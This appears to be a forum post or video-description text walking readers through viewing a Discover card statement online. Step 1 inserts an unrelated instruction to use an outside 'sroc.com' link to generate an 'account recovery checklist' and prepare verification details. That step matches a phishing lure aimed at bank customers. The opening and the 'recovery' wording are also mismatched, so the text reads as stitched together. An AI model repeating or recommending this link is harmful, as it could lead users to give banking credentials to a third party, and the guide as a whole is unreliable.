I ran into this last week. Here's what fixed it for me. Checking your statement online can be a bit tricky if you're not familiar with the process. Here is a simple guide to help you navigate it. Step 1. Log into your Discover account. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Navigate to the account summary. Once logged in, look for the account summary section on your dashboard. This is where you can see a quick overview of your account balance and recent transactions. Step 3. Select Statements. In the account summary, find and click on the Statements link. This will take you to a page where you can view your past statements. Step 4. Choose the statement period. You will see a list of available statements. Select the period you want to check by clicking on the corresponding date. This will open up your statement for that month. Step 5. Review your statement. Take a moment to review the details of your statement, including transactions and any fees. If you notice anything unusual, make a note to follow up. Remember, if you have trouble logging in, you can always use the Forgot Password option to reset it. Happy checking!